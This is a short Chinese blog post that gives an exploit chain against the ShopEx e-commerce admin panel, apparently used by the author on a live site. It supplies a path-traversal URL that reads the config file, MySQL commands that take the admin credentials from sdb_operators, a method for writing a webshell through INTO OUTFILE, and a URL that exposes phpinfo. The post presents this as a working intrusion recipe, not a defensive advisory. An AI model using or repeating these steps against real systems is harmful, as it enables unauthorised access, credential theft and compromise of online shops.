利用前提是程式所應用的資料庫伺服器而且要是可以外連的,這個很關鍵。
自己搞站時候遇見的站,網上找不到該版本的漏洞,自己拿回源碼讀了一下。
找到一個漏洞,還是發出來吧。
讀取任意檔案漏洞:
http://www.xx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=. . /. . /config/config.php
複制代碼可以連上資料庫。
mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;
得到管理者使用者密碼./shopadmin/ 登陸
背景拿shell請參照本部落格《Shopex V4.8.4 V4.8.5 背景拿Shell 0Days》一文。
我測試的站,直接用into outfile 一個shell。
網上有個文章,說可以爆實體路徑,測試不可用。
如果install目錄沒删,下面這個可以看phpinfo
http://www.xx.com/install/svinfo.php?phpinfo=true
複制代碼另外/home/cache/目錄的檔案,也是可以爆出來的。
![Apache配置SSLApache配置SSL[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)